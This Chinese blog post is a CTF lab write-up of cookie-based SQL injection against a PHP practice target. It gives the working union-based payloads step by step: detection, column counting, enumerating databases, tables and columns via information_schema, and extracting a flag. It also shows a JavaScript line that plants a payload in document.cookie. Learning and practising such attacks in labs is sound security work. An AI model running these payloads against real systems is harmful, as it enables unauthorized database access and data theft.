Cookie注入(PHP页面)

本文介绍了如何进行Cookie注入,从靶机地址的准备到利用ModHeader插件进行请求头修改,再到判断注入、查看列数、找回显点、选择数据库和表,直至最终找到并获取flag的过程。同时,作者分享了在PHP环境下与ASP环境Cookie注入的不同之处,提醒注意JavaScript过滤问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

靶机地址:http://www.whalwl.top:8009 【2020年8月前有效】

一、准备工作:

在火狐浏览器上安装一个叫ModHeader的插件,请求头修改神器。

记住它的样子,然后就可以行动了。怎么弄插件,此插件怎么用,请大家自行百度,我是不会跑题的。

 

二、过程步骤:

1、判断是否存在注入

id=1’  //报错
id=1 and 1=1  //不报错
id=1 and 1=2  //报错

存在注入,此处不打算截图

2、查看字段数,即列数

id=1 order by 5
//用二分法一个个尝试,发现order by 6时报错,5刚好不报错,可知是5列

 

3、查找回显点

id=-1 union select 1,2,3,4,5 
//联合查询中,为了显示后面的值,记得否定前面(id=-1)

 

回显2,3,4

4、查找有哪些数据库

id=-1 union select 1,2,3,group_concat(schema_name),5 from information_schema.schemata

 一眼瞧中了cookie这个数据库,被别问我为什么【题目明明白白写着cookie注入】

5、找cookie数据库中存在哪些表名

id=-1 union select 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema = 'cookie'  

有一个this_flag表 

6、查找在cookie数据库的this_flag表中存在哪些字段【据以往经验,会有一个flag字段】

id=-1 union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_schema = 'cookie' and table_name ='this_flag'

7、扒出flag

id=-1 union select 1,2,3,flag,5 from this_flag

 

三、经验教训

     在注入环境上浪费了蛮久,php环境和asp环境的cookie注入方式是不一样的,我说怎么url清空后输入javascript:alert(document.cookie="id="+escape("171 order by 1")),其中JavaScript就过滤了

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值